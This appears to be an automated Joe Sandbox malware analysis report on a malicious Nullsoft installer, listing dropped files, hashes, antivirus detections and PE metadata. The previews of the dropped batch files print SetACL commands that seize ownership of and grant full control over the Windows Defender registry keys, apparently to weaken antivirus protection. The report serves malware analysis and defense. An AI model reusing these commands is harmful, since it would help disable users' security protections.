        https://helgeklein.com/setacl/documentation/command-line-version-setacl-exeSetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drfalse
          		high

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:38.0.0 Beryl
          Analysis ID:1284605
          Start date and time:2023-08-02 19:40:07 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 10m 35s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:43
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:Ptmhbplhxb.exe
          Original Sample Name:92189d2d76db2a5549f25e35a52a2451.exe
          Detection:MAL
          Classification:mal60.winEXE@143/12@0/0
          EGA Information:
          • Successful, ratio: 50%
          HDC Information:
          • Successful, ratio: 100% (good quality ratio 97%)
          • Quality average: 85.4%
          • Quality standard deviation: 23.5%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 66
          • Number of non-executed functions: 139
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated

          Warnings

          • Exclude process from analysis (whitelisted): Conhost.exe
          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exeP196hUN2fw.exeGet hashmaliciousUnknownBrowse
            LruEqu1rpq.exeGet hashmaliciousUnknownBrowse

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\2MB2.zip

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:data
              Category:dropped
              Size (bytes):2000000
              Entropy (8bit):7.999908296216761
              Encrypted:true
              SSDEEP:49152:CYZIxXCEOcRkXc87PMpz8uru41xvnXqExZg+PuvsFztv:VZIx1OlX3Uzh7v6ExZTuEPv
              MD5:F64C9DE8E8BB8D1761057E7E339C9A94
              SHA1:F91049045B62DEB980BF7362B1AF9B9488EFDF38
              SHA-256:B3E1685DF9F8C95EFE227AA0EDEDBFA22D7B40DCA8D0EAFE6C2D17D178416073
              SHA-512:EB033FE3E8866F7E14E34DFF70B729C9130F5547D1AD7D3DECB569AC677CD7B727C073F99315EEBD5AC57E76EC3C07B503094538AC593EC44D6887B50761A4CC
              Malicious:false
              Preview:........c..e..$...>.K.5.q..n-.O8..R.5Z.z.Ewo..Qs.y...Q...<$}O4.h...%#.p...<..jo.E?..3..U14.F.......c.Q;........ze.....)..\y6.FL!+.....\...;..T.......yR.M.^P....P..C|iZKQ..T.6s.}&.N...p....I..."n%+.....:X..:.#.w....6....Lb.O.!j.\9...0.&../.....8G...A0...u.k.....a..x..j. :&,.jT......G6R....jT~|.*HQ!u.c9....9Z..._.Gr:[.K...N}.2...]..q....s.,.P.s^...4m...0NF..y.l.S.r..B..->Le..{.%...H..1...=(.O.x*..6.Q.s.. ..7 P..l..Nn..... =i...H.y..+..._p.E.8r).p...c...aw(H.8.]....g..>...6K&......`y8<...,p...F.G....Gm-C}..#.....,.bz...Y..MU.`.T..f.z..x..;...\CG........a.|e...7......YD.-.T...YXi..!*.u.r...#.oL...+.j+.T.0I.W..7L..m.l...3.@"9.z.*..4'7-.>...Q...{Z/.!.J.....r.<.A...6...L..t..:.d..M...g ..#i.!..;.....l.&&".s...w,.B}....[8..u.H....WY}.....{#(}.N!..M..t.. ....3.V...r.....1V.......k...;...M.8?...U...8..(Q...JI.A...|G....y.@...&...P..bW.."s.....(.:(.C.......s.x..n...!..E.1.|f..C..G..../.....'...(.a...|]Vs.}M......Q."w}..n.F.....}.c.....q.Y./8<..

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):794400
              Entropy (8bit):6.812760876754632
              Encrypted:false
              SSDEEP:12288:XaWzgMg7v3qnCi9ErQohh0F4fCJ8lnyQQdbpSulVAbWjuixwhQaB/Q:qaHMv6CRrj3nyQQdpSulmWjxwhQaG
              MD5:71C7975385F73AE32B06F69DBE79290B
              SHA1:05A1197CB8BD88447199E42A75BFCF99E32F2C48
              SHA-256:C0ABBEEA8AE726503BC5643F3471E378D92FCB59A37043062BBF9BA64D95004C
              SHA-512:1A6549788E97E5D07560F58DC11088424F0F90815F0CED2173BE169AD4DBF0E55CD19B40FBF8F65D65E0F6CADB21C0489DC6A8DE999859D12244879F4722EC95
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 32%
              • Antivirus: Virustotal, Detection: 32%, Browse
              Joe Sandbox View:
              • Filename: P196hUN2fw.exe, Detection: malicious, Browse
              • Filename: LruEqu1rpq.exe, Detection: malicious, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L......K..........#..........4.......c....... ....@.................................2d........@.......@.....................<...T....................... ............................................................ ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exe

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:PE32+ executable (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):945944
              Entropy (8bit):6.654096172451499
              Encrypted:false
              SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
              MD5:EFE5769E37BA37CF4607CB9918639932
              SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
              SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
              SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 2%
              • Antivirus: Virustotal, Detection: 4%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:PE32 executable (console) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):526200
              Entropy (8bit):6.458888752002344
              Encrypted:false
              SSDEEP:12288:dISQ0bSlUcGj4wJUWKk2cgLOKvlZeX8KDNqb3kE1+mQwxVqnz1gqntMeyNC5fmVa:SLvlUcoXoxqnz17nryM5fmVlZq
              MD5:93B828ED97CB2C701364DF520DDD5331
              SHA1:CD8B4B8499D14A0E44DE3DC855AA5A8BA588E3D9
              SHA-256:9E2E0F10F6DDE0E19E441DEC7A6F14A813E5D39E9D7F70B2B48B88491F69BB9B
              SHA-512:86EF1CAF8102A119C239E62AF416AA07D85BDD0FA6815BEAB075A7B68DEC3F8DA293A309D915683010B6F7476F85EF38C9F5A8FF518B1F0A1EDB15884713B4B9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              • Antivirus: Virustotal, Detection: 0%, Browse
              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......../6..NX..NX..NX..&[..NX..&]..NX..&^..NX.'<]..NX..;\..NX..;[..NX..;]..NX..&\..NX..&Y..NX..NY..OX..;Q..NX..;...NX..N..NX..;Z..NX.Rich.NX.........................PE..L......`.....................2...................@..........................0......[.....@..................................y..........x...............x.......lF......p...............................@............................................text...F........................... ..`.rdata..F...........................@..@.data....'...........t..............@....rsrc...x...........................@..@.reloc..lF.......H..................@..B........................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exe

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:PE32+ executable (console) x86-64, for MS Windows
              Category:dropped
              Size (bytes):616312
              Entropy (8bit):6.302197712270286
              Encrypted:false
              SSDEEP:12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
              MD5:1FB64FF73938F4A04E97E5E7BF3D618C
              SHA1:AA0F7DB484D0C580533DEC0E9964A59588C3632B
              SHA-256:4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
              SHA-512:DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              • Antivirus: Virustotal, Detection: 0%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\do32.bat

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):12739
              Entropy (8bit):5.177383295779892
              Encrypted:false
              SSDEEP:192:pBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6O:0+
              MD5:24E07246F0E8F5B0029AE7167B667ACE
              SHA1:63F61A2585FF45F17C168BE18164AFDD448773F2
              SHA-256:667E5C9CBE8D6D58E61A2628EBCBD6986D8701AC5670FDA668D999794F0EECF9
              SHA-512:0611BFB6815DDC8D881908BA39F956B21CA99179CF04DCABFDED3B5D98E13C9AFD11B35504DBB9956CBE8F685142ADF6AB5FBD1F3605C316903F4E631AB9DC8F
              Malicious:false
              Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\do64.bat

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):12767
              Entropy (8bit):5.189808508831073
              Encrypted:false
              SSDEEP:192:lBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:QK
              MD5:1ABF8067994181B1A38867BF6437F9D2
              SHA1:D25E23848F65B85F0F21E9A0A69E4268B625ECA2
              SHA-256:23BBB732FF55AB62DC8863A69626EF5655F60BF0D7B96FA2818A895E81283B40
              SHA-512:6237826DE2FEAF63C2F1312680118474F9B60F5516A05E171743A09A088D7C9BFD06CE9DE17852E6F4C2DCB577814163621FF27B2A7BBB37F2A1AE130F64D882
              Malicious:false
              Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):5632
              Entropy (8bit):4.240862253741395
              Encrypted:false
              SSDEEP:48:6DIo1LEbxpumam2O3qrkfy8Hgo+AMJpSrgCtWrNtnTwtLCctMlaqaRVm69FWSfbi:gZ1L5Pm2OarkfyBwptYNtTPGXzNt
              MD5:B2DF99CF7A7B3239BDD77FD9A85A1D06
              SHA1:D37FA95D10A9E17108BECB1E81B09326A6C3C7DE
              SHA-256:D74ECE6000F3AFF6F08F127F5C7605A57F892B593C05A092498061D161A5A2E5
              SHA-512:42EBFB684E5F2BCCC982751791321FB6F929A9B73F0E317D3E61EEDB167B0D1DC953F9EC87C8C856C7B81D4FCE5AE6CEBEE45269C99364743B19F2DE2B1EB32A
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 3%
              • Antivirus: Virustotal, Detection: 17%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.............................*... ...@....@.. ....................................@..................................*..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......0"..p............................................................0..#.......(.... .........s....(.......(....j*..0..........r...p(....r...p(....r...p(....r...p(....r=..p(....rW..p(....(.....r...p(....rW..p(....rW..p(....rW..p(.....(....&r...p(....rW..p(....s.......%-.&r...pr...p(.......o....(........%-.&r...p.(.....!&r...p(....r...p(....rW..p(.................r...p....r...p.....(...+r...p(..........+........(....rW..p(.......X.......i2.r...p..r...p.......o...........r

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe.config

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):309
              Entropy (8bit):5.021891252558085
              Encrypted:false
              SSDEEP:6:TMVBd1IGMfVVa7VNQA1Q7VJdfEyFRfyrhAd+LWmtCluyyuQIm:TMHdGGsVazcrfyWd+hyyuxm
              MD5:99BC4155BE42BFF7FBACF63EE97390D9
              SHA1:F26D90583E1027F4F277AC954CE0F8EAD5CDA388
              SHA-256:6420003143A560F7707D70B5027F54FE4AE3C8CB78E993977DFCD40E542DE61E
              SHA-512:82BC4F920A0B3B54C3DBF7F48269748C3099C48FD9B779E705A966255C71A804FB8BE6E36926976DCDD7076A920D26F6A0F79D22BD4941AE9D795256D9EE132C
              Malicious:false
              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup><system.net><defaultProxy useDefaultCredentials="true" /></system.net>..</configuration>..

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\nsExec.dll

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):6656
              Entropy (8bit):4.994818958746835
              Encrypted:false
              SSDEEP:96:f7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNPS3e:zXhHR0aTQN4gRHdMqJVgNPR
              MD5:B38561661A7164E3BBB04EDC3718FE89
              SHA1:F13C873C8DB121BA21244B1E9A457204360D543F
              SHA-256:C2C88E4A32C734B0CB4AE507C1A9A1B417A2375079111FB1B35FAB23AEDD41D9
              SHA-512:FEDCAAC20722DE3519382011CCF22314AF3EDCD11B69F814DB14710966853B69B9B5FC98383EDCDB64D050FF825264EABA27B1C5ADFE61D1FC9D77F13A052CED
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              • Antivirus: Virustotal, Detection: 1%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...P..Y...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):5632
              Entropy (8bit):3.9224675212459275
              Encrypted:false
              SSDEEP:48:64i5+ozr+LWq4mswa2sMJLKY2LeCSAgjlA1aOCFFWSfbNtm:I5+ozrBq4tY2LgjsszNt
              MD5:935BA4EC020C33E5E8727AF55FDBFA36
              SHA1:9CE2633D2B58D410CCEF0BA027331906BA9C7E59
              SHA-256:2FB5D9D8ED4F8945609CE725C1E1286A2A3CE0ED711FD1C5217E440949C8B5D1
              SHA-512:9A98A8B86D4D253738336544E4BFD03001A4396559ACBE37A7098760D231857034BB894099B34ABF1B8981A30478EB492C3BC3D0CCCD7323A1751F6B911A09AD
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 3%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.............................*... ...@....@.. ....................................@..................................*..O....@..@....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................*......H.......p!..<............................................................0..........r...p(....rC..p(....ro..p(....(.....r...p(....r...p(.....(....&ro..p(....s..........(....r...p(....r...p(....rC..p(....ro..p(....r/..p.r...p.r...p(.......o.....r...p(........r...p.r...p(....(....+.r...p.r...p(....(....(....&.(....&*.0...........(.....s........o....*..(....*..BSJB............v2.0.50727......l...,...#~..........#Strings....L.......#US.P.......#GUID...`.......#Blob...........G...

              C:\Users\user\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config

              Download File
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):239
              Entropy (8bit):5.021036233822738
              Encrypted:false
              SSDEEP:6:TMVBd1IGMfVVa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVazcrfyW3xm
              MD5:F2ECA2D00A9C69AF3E08C55DA5EC8299
              SHA1:5001564F3BFE5CDC60BDA5A14D8AF59105AB97DD
              SHA-256:6FC2543E8CD92F5DB9CAA385B64E5ABAB27D64D4F335B0E0F3A8FE8E87B8F181
              SHA-512:711072383DFB333A6C4ACE51E04C3FAA6B5D712533EEE0B2685DDBD00A45C4213203B62490A435E6F4AABD2F64319A25E71D0C6269E677F3B20EF90E7A98BFFC
              Malicious:false
              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.99782737412941
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Ptmhbplhxb.exe
              File size:3'596'632 bytes
              MD5:92189d2d76db2a5549f25e35a52a2451
              SHA1:59708813a1744a959c35a0412f4bd2cae862ffa0
              SHA256:b9fdbe8b2868d78c2fbe632a82d102bf5b334b256d21565e3173ba8ebe169ba5
              SHA512:bfc96e69b59cb3fedeb8ff0675e2947e5fd26316e2a5157a1656299fd08170f231e9b2433d97027ab9058ad0156a46d18e4482d6db3a143a9a9137dd6b6e3765
              SSDEEP:98304:rZxnMDp/mW16XnaVn/tW5xZIx1OlX3Uzh7v6ExZTuEP7:rZZMD3wXajW76xIXkzhdf
              TLSH:4FF53302DA45D5FBE6B206B06621BEA8DFC9F401E3200717637C9DA6BB94AF4530D673
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...z..Y.................d...|.....

              File Icon

              Icon Hash:31cc06b2361e1918

              Static PE Info

              General

              Entrypoint:0x4031f1
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x597FCC7A [Tue Aug 1 00:34:02 2017 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:3abe302b6d9a1256e6a915429af4ffd2

              Entrypoint Preview

              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 0040A198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004080A0h]
              call dword ptr [0040809Ch]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [0042F40Ch], eax
              je 00007FCE8CAEB013h
              push ebx
              call 00007FCE8CAEE0CAh
              cmp eax, ebx
              je 00007FCE8CAEB009h
              push 00000C00h
              call eax
              mov esi, 00408298h
              push esi
              call 00007FCE8CAEE046h
              push esi
              call dword ptr [00408098h]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007FCE8CAEAFEDh
              push 0000000Ah
              call 00007FCE8CAEE09Eh
              push 00000008h
              call 00007FCE8CAEE097h
              push 00000006h
              mov dword ptr [0042F404h], eax
              call 00007FCE8CAEE08Bh
              cmp eax, ebx
              je 00007FCE8CAEB011h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007FCE8CAEB009h
              or byte ptr [0042F40Fh], 00000040h
              push ebp
              call dword ptr [00408044h]
              push ebx
              call dword ptr [00408288h]
              mov dword ptr [0042F4D8h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 00429830h
              call dword ptr [00408178h]
              push 0040A188h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x85340xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x42a8.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x62540x6400False0.6676171875data6.4338643172916266IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x80000x13540x1400False0.4599609375data5.236269898436511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xa0000x255180x600False0.4557291666666667data4.044625496015545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .ndata0x300000x1b0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x4b0000x42a80x4400False0.3018152573529412data4.944452051049104IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x4b1f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.2642116182572614
              RT_ICON0x4d7980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.324812382739212
              RT_ICON0x4e8400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5035460992907801
              RT_DIALOG0x4eca80x100dataEnglishUnited States0.5234375
              RT_DIALOG0x4eda80x11cdataEnglishUnited States0.6056338028169014
              RT_DIALOG0x4eec80x60dataEnglishUnited States0.7291666666666666
              RT_GROUP_ICON0x4ef280x30dataEnglishUnited States0.8333333333333334
              RT_MANIFEST0x4ef580x34bXML 1.0 document, ASCII text, with very long lines (843), with no line terminatorsEnglishUnited States0.5527876631079478

              Imports

              DLLImport
